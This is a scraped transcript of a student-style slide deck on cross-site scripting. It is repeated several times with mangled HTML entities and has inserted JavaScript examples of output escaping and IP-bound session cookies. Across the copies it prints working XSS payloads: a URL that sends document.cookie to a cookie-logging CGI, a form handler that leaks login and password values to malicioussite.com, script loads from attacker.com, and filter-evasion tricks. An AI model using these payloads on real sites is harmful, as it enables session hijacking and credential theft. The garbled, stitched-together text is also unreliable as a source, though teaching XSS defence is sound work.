Internet hacking presentation


description

Just a little info about how internet hacking is done and how to protect against it ...

Transcript of Internet hacking presentation

Page 1: Internet hacking presentation

1

The Internet is a great resource for every kind of work… for every task there is a different site.

Earlier these sites were static… i.e. just paragraphs and text files… which were a huge task to read…

But today websites are more complex than ever, containing a lot of graphic and dynamic content, making the experience more enjoyable for the user.

2

Dynamic content

>> Images >> Music >> Different styled text >> Advertisements

And many more ………

3

WELL NOW LET US CONCENTRATE ON THE USEFUL MATTER…………

4

Cross Site Scripting

XSS

5

It is a type of computer security vulnerability found in web applications. An attacker injects untrusted content into a dynamic web page, and neither the web site nor the client has enough information to recognise that content as foreign… The flaw that lets the content through is called an XSS hole; the injected script itself is the payload.

6

Causes

The DYNAMIC content…… Its appearance is attractive for users, but like a worm it is eating away at the user from behind…

Lack of secure CODE practice…… The developer who writes the page that echoes user input often has little experience and does not provide proper security.

7

Threats ……………

Taking over the user's session before the user's session cookie expires.

Connecting users to a malicious server of the attacker's choice.

Convincing a user to access a URL supplied by the attacker can cause script or HTML of the attacker's choice to be executed in the user's browser. Using this technique an attacker can take actions with the privileges of the user who accessed the URL, such as issuing queries on the underlying SQL databases and viewing the results.

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass the client-side security mechanisms imposed on web content by modern browsers, above all the same-origin policy. By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content, session cookies and other information maintained by the browser on behalf of the user.

9

• XSS is an application-level attack which involves 3 parties: the attacker, the vulnerable site and the victim's browser.

• We can load an external script with a <script src=...> tag.

• Script content can be loaded from anywhere (RPC/remote scripting is common).

• Most attacks are only focused on collecting cookies.

• The attacker does not see the actual responses sent to the client.

• We can leak the contents of pages, form values, results from submits and JavaScript vars as URL parameters of <img>, <script> and other tags that refer to the attacker's site.

10

Types of XSS Attacks

11

Non-Persistent

• It is the most common type (also called reflected XSS). These holes show up when data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly sanitising the response.

• Because HTML documents have a flat, serial structure that mixes control statements, formatting and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection.

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML-formatted messages for other users to read.

13

Examples of attacks………

14

Scripting Via Malicious Link…

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing a malicious link such as:

<A HREF="http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>

When the user clicks on this link, the URL is sent to legitimateSite.com including the malicious code. If the legitimate server sends a page back to the user that includes the value of clientprofile, the malicious code will be executed in the client's web browser.

16

Stealing the User's COOKIE…

17

If any part of the web site uses cookies, then it may be possible to steal them from its users. In this scenario the attacker posts a page with a malicious script to the part of the site that is vulnerable. When the page is displayed, the malicious script runs, collects the user's cookies and sends a request to the attacker's web site carrying the cookies gathered. Using this technique the attacker can gain sensitive data such as passwords, credit card numbers and any arbitrary information the user inputs.

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message. Because the malicious scripts are executed in a context that appears to have originated from the legitimate server, the attacker has full access to the document retrieved and may send data contained in the page back to their site. If the embedded script code can interact further with the legitimate server without alerting the victim, the attacker can post data in the victim's name to a different page on the legitimate web server.

20

By Scripting

21

A script can read all HTML content/tags in another window.

A script can set/delete tags/content in another window. We can read and set form values, then run submit().

A script can set vars and call functions in another window.

document.write can allow a script to create new tags/content in another window.

This means that a script can read all HTML contents of a document, change the appearance of the document, modify existing tags and values, and modify and submit forms. We have full control of the other window as long as it is in the same origin (same document.domain), and that is exactly what an injected script gets: it runs as the site.

If we can forward cookies, then we can also forward other JScript-accessible content to an attacker. We can forward page contents, form values (including hidden ones…), JScript vars/state and JScript errors.

22

Some FACTS about the XSS attacks………

23

By SURVEY………

1st Gen XSS was against public sites and ran against everyone that visited the site.

2nd Gen XSS focused on sites that allow self-reflecting XSS.

24

• Cross-site scripting attacks are a special case of code injection.

• Cross-site scripting carried out on websites accounted for roughly 80% of all security vulnerabilities documented by Symantec as of 2007.

• Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data.

25

Dynamic XSS with 2-way comms (diagram)

Victim Browser: the XSS against the site runs script commands inside an IFRAME, and other documents on the site are loaded into that IFRAME.

XSS Vulnerable Server.

Attacker System: the injected script fetches new JScript… with <script src="attacker.com"> and leaks the frame's contents back with <script src="attacker.com/innerHTML_of_IFRAME">.

26

Some prominent sites that have been affected in the past are……

The search engine Google; the email services of Google and Yahoo; the social networking sites Facebook, MySpace and Orkut. The developers of MediaWiki have fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users.

Researchers have claimed that as many as 68% of websites are likely open to XSS attacks.

27

By seeing all this, the question that arises is……

Then how can we prevent it?

28

Yes, some methods are there for prevention, and those are: >> Filtering >> Cookie Security >> Disabling Scripts >> Encryption (encryption in transit only protects data on the wire; it does nothing against a script that is already part of the page).

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields, or, better, to escape all untrusted data using a method appropriate for the output context. There are several different escaping schemes that must be used depending on where the untrusted string needs to be placed, including HTML entity encoding, JavaScript escaping, CSS escaping and URL encoding. Most web applications that do not need to accept rich data can use output escaping to largely eliminate the risk of XSS in a fairly straightforward manner.
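The reflected and stored cases described earlier, and the context-specific escaping this slide calls for, as an added example that is not part of the presentation: a search-results handler written twice, once copying the query straight into the page and once encoding it for each context it lands in (HTML text, quoted attribute, JavaScript string literal). The escape helpers, the template and the payload are all constructed here; no framework or real site is involved.

```javascript
// Added example (not from the presentation): a reflected-XSS search handler,
// shown vulnerable and then hardened with output encoding chosen per context.
// Nothing here touches a network; the "request" is just a string argument.

// HTML text and quoted-attribute context: entity-encode the five characters
// that can change markup meaning. Attributes must be quoted for this to hold.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

// JavaScript string-literal context: \xHH/\uHHHH-escape everything outside a
// small safe set, so a value can never close the quote or the enclosing </script>.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Vulnerable: the query parameter is copied verbatim into three contexts.
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>
<input name="q" value="${q}">
<script>var lastQuery = "${q}";</script>`;
}

// Hardened: same page, each interpolation encoded for the context it lands in.
function renderSearchHardened(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>
<input name="q" value="${escapeHtml(q)}">
<script>var lastQuery = "${escapeJsString(q)}";</script>`;
}

// Crude oracle: does the output carry a script element or event handler the
// template itself did not define? The template has exactly one <script>.
function containsInjectedMarkup(html) {
  const scripts = (html.match(/<script/gi) || []).length;
  return scripts > 1 || /\son\w+\s*=/i.test(html);
}

// Constructed payload in the style of the cookie-theft link on slide 35.
const payload = '"><script>document.location="http://attacker.example/?"+document.cookie</script>';
console.log('--- vulnerable ---\n' + renderSearchVulnerable(payload));
console.log('--- hardened ---\n' + renderSearchHardened(payload));
```

The point the oracle makes is that there is no single "safe" encoding: the same value needs entity encoding in the `<h1>` and the attribute but `\xHH` escaping inside the script block, and applying the HTML encoder to the JavaScript context would leave `"` as `&quot;`, which the JS parser never decodes, while a raw `</script>` would still end the block.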

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal them. To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use the cookie. Marking the session cookie HttpOnly keeps it out of document.cookie altogether, which is the more direct fix; neither measure stops an injected script from simply making requests from inside the victim's browser.
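An added example, not from the presentation, of the IP-bound session the slide describes combined with an HttpOnly, Secure cookie: a small in-memory session store, the Set-Cookie header it issues, and a check that rejects a stolen cookie replayed from another address or after expiry. Session ids, IP addresses, timestamps and cookie headers are constructed values.

```javascript
// Added example (not from the presentation): session cookie issued with
// HttpOnly/Secure and bound to the client IP seen at login. All values here
// (ids, IPs, times) are constructed; no network or real framework is used.

const sessions = new Map(); // sid -> { user, ip, expires }

// Set-Cookie value for the session id. HttpOnly keeps the cookie out of
// document.cookie, so a script injected via XSS cannot read and forward it;
// Secure keeps it off plain HTTP; SameSite=Strict blocks cross-site sends.
function sessionCookieHeader(sid, maxAgeSeconds) {
  return `sid=${sid}; Path=/; Max-Age=${maxAgeSeconds}; HttpOnly; Secure; SameSite=Strict`;
}

// Record a new session and return the Set-Cookie header to send. `now` is a
// millisecond timestamp passed in so the behaviour is deterministic.
function login(user, clientIp, now, ttlSeconds, sid) {
  sessions.set(sid, { user, ip: clientIp, expires: now + ttlSeconds * 1000 });
  return sessionCookieHeader(sid, ttlSeconds);
}

// Split a Cookie request header ("a=1; b=2") into an object.
function parseCookies(header) {
  const out = {};
  for (const part of String(header || '').split(';')) {
    const i = part.indexOf('=');
    if (i <= 0) continue;
    const name = part.slice(0, i).trim();
    const raw = part.slice(i + 1).trim();
    try { out[name] = decodeURIComponent(raw); } catch (e) { out[name] = raw; }
  }
  return out;
}

// Resolve a request to a user, or null. A cookie stolen through XSS and
// replayed from the attacker's machine fails the IP binding even though it
// has not expired yet.
function authenticate(cookieHeader, clientIp, now) {
  const sid = parseCookies(cookieHeader).sid;
  const s = sid ? sessions.get(sid) : undefined;
  if (!s) return null;
  if (now > s.expires) { sessions.delete(sid); return null; }
  if (s.ip !== clientIp) return null; // the IP binding from the slide
  return s.user;
}

// Stand-alone demo with constructed values.
const demoHeader = login('alice', '203.0.113.5', 1000000, 900, 'demo-sid');
console.log(demoHeader);
console.log(authenticate('sid=demo-sid', '203.0.113.5', 1000500));  // alice
console.log(authenticate('sid=demo-sid', '198.51.100.9', 1000500)); // null
```

IP binding is the slide's mitigation and it does block the classic "mail me document.cookie" exploit, but it locks out users whose address changes mid-session (mobile networks, NAT pools, proxies), so in practice the HttpOnly flag carries most of the weight and the binding is a defence in depth.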

31

Disabling Scripts…

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis.

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effective…

Problems with this… Substantial reduction in functionality and responsiveness. Many sites do not work without client-side scripting, forcing users to disable the protection for that site and opening their systems to the threat.

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explanation purposes

Remember the syntax…

34

SYNTAX: script injection in an image src tag

• Embed nested quotes: ' or " or \u0022 \u0027

• Keyword filters that allow any JS to execute are useless: A = 'navi'; B = 'gator.userAgent'; alert(eval(A+B))

• Limited input length + script block embed = unlimited script power (<script src=...>)

• SSL pages warn if a script src comes from an untrusted site, but not if you can upload, say, an "image" that is actually JS commands

• Methods of script encoding:

<img src=vbscript:do&#99;ument.lo&#99;ation='http://ab.com'>

<IMG SRC="javascript:alert('test')">

<IMG SRC="javasc ript:alert('test')">   (whitespace inside the scheme name)

35

Types of information leakage

Client can reveal cookies to a 3rd party (session state, order info, etc.):

http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

Client can reveal posted form items to a 3rd party (userID, passwd, etc.):

<form action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;"></form>

Client can be tricked into accessing/posting spoofed info to a trusted server:

www.trustedserver.com/xss.asp?name=<iframe src=http://www.trustedserver.com/auth_area/orderupdate?items=4000></iframe>

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt

2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt

3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt

37

Related vulnerabilities: several classes of vulnerabilities or attack techniques are related to XSS. Cross-zone scripting exploits zone concepts in certain browsers and usually executes code with greater privilege.[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems at the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting).[32]

Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS: rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.[33]

Lastly, SQL injection exploits a vulnerability in the database layer of an application. When user input is incorrectly filtered, arbitrary SQL statements can be executed by the application.

Page 2: Internet hacking presentation

2

Dynamic content

gtgt Imagesgtgt Musicgtgt Different Styled Textgtgt Advertisements

And many more helliphelliphellip

3

WELL NOW LET US CONCENTRATE ON THE USEFUL MATTERhelliphelliphelliphellip

4

Cross Site Scripting

XSS

5

It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to

recognize ithellip amp this injected code is called XSS Holehellip

6

Causes

The DYNAMIC contenthelliphellip Its overview is attractive for the users but

like worms it is eating the user at the backhellip

Lack of CODE practicinghelliphellip This cause is based on the fact that the

developer who inserts the script has not a lot of experience and is in deficient to provide proper security

7

Threats helliphelliphelliphelliphellip

Taking over the user session before the users session cookie expires

Connect users to a malicious server of the attackers choice

Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 3: Internet hacking presentation

3

WELL NOW LET US CONCENTRATE ON THE USEFUL MATTERhelliphelliphelliphellip

4

Cross Site Scripting

XSS

5

It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to

recognize ithellip amp this injected code is called XSS Holehellip

6

Causes

The DYNAMIC contenthelliphellip Its overview is attractive for the users but

like worms it is eating the user at the backhellip

Lack of CODE practicinghelliphellip This cause is based on the fact that the

developer who inserts the script has not a lot of experience and is in deficient to provide proper security

7

Threats helliphelliphelliphelliphellip

Taking over the user session before the users session cookie expires

Connect users to a malicious server of the attackers choice

Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

• Cross-site scripting attacks are a special case of code injection

• Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007

• Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data

Diagram: Dynamic XSS with 2-way comms. Labels in the figure: Victim Browser (XSS against site; an IFRAME in which script commands run and into which other documents on the site are loaded), XSS Vulnerable Server, Attacker System (new jscript…). The browser-side script tags shown are <script src="attacker.com/innerHTML_of_IFRAME"> and <script src="attacker.com">

26

Some prominent sites that have been affected in the past are…

The search engine Google, the email services of Google and Yahoo, and the social networking sites Facebook, MySpace and Orkut. The developers of MediaWiki have fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users.

Researchers have claimed that as many as 68% of websites are likely open to XSS attacks

27

By seeing all this the question that arises is…

Then how can we prevent it?

28

Yes, some methods are there for prevention, and those are:
>> Filtering
>> Cookie Security
>> Disabling Scripts
>> Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields, or to escape all untrusted data using a method appropriate for the output context. There are several different escaping schemes that must be used depending on where the untrusted string needs to be placed, including HTML numeric entity encoding, JavaScript escaping, CSS escaping and URL encoding. Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner.
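Context-aware escaping in practice, as an added example written for this page and not part of the presentation: escapeHtml, escapeJs and escapeUrl are this example's own functions, one per output context named on the slide (CSS escaping is left out), and renderVulnerable / renderSafe show the clientprofile parameter from the malicious-link scenario rendered without and with encoding. The sample input is constructed; the code runs under Node.js.

```javascript
// Added example (not code from the presentation): context-aware output
// encoding of untrusted data. Function names and the sample input are
// this example's own.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

// HTML text and quoted-attribute context: entity-encode every character
// that could close the text node or the attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

// JavaScript string-literal context: hex-escape everything that is not
// alphanumeric, so the value can end neither the literal nor the <script> block.
function escapeJs(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// URL query-parameter context.
function escapeUrl(s) {
  return encodeURIComponent(String(s));
}

// The pattern behind the "scripting via malicious link" scenario: the
// request parameter is copied into the page unchanged.
function renderVulnerable(clientprofile) {
  return `<p>Welcome, ${clientprofile}</p>`;
}

// Hardened rendering: each placeholder uses the encoder for its own context.
function renderSafe(clientprofile) {
  return [
    `<p>Welcome, ${escapeHtml(clientprofile)}</p>`,
    `<a href="/profile?name=${escapeUrl(clientprofile)}">profile</a>`,
    `<script>var profile = "${escapeJs(clientprofile)}";</script>`,
  ].join('\n');
}

// Constructed sample input of the kind the slides show.
const SAMPLE = '<SCRIPT>alert(1)</SCRIPT>';

// True when the untrusted input survives verbatim in the rendered page.
function injectedMarkupSurvives(html, input) {
  return html.includes(input);
}

console.log(renderVulnerable(SAMPLE)); // the tag reaches the browser untouched
console.log(renderSafe(SAMPLE));       // encoded differently in each context
```

The point the slide makes and the example enforces: one encoder is not enough. HTML entity encoding protects the paragraph, but the same value placed inside a script literal or a URL needs its own scheme, otherwise the encoded text is decoded by the wrong parser and the injection survives.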

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal these cookies. To mitigate this particular threat, many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie.

31

Disabling Scripts…

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effective…

Problems with this…: substantial reduction in functionality and responsiveness. Many sites do not work without client-side scripting, forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view, and to use its search engine to find the content.

33

For explaining purpose

Remember the syntax…

34

SYNTAX: script injection in an image src tag
• Embed nested quotes
• ' or " or \u0022 \u0027
• Keyword filters that allow any js to execute are useless
• A = 'navi'; B = 'gator.userAgent'; alert(eval(A+B))
• Limited input length + script block embed = unlimited script power (script src=)
• SSL pages warn if script src comes from an untrusted site
• but if you can upload, say, an img that is actually js commands
• methods of script encoding
• <img src=vbscript:do&#x63;ument.lo&#x63;ation=http://ab.com>
• <IMG SRC="javascript:alert('test')">
• <IMG SRC="javasc ript:alert('test')">

35

Types of information leakage

Client can reveal cookies to 3rd party (session state, order info, etc.)

